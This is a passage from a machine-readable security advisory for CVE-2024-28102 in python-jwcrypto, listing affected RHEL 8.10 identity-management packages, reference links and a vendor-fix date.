"AppStream-8.10.0.Z.MAIN.EUS:python-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaserver-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipatests-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-28102"
},
{
"category": "external",
"summary": "RHBZ#2268758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268758"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-28102",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28102"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-28102",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28102"
},
{
"category": "external",
"summary": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f",
"url": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f"
},
{
"category": "external",
"summary": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97",
"url": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97"
}
],
"release_date": "2024-03-08T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-05-22T11:47:22+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19692+fac39a03.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19692+fac39a03.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-dns-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaserver-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipatests-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
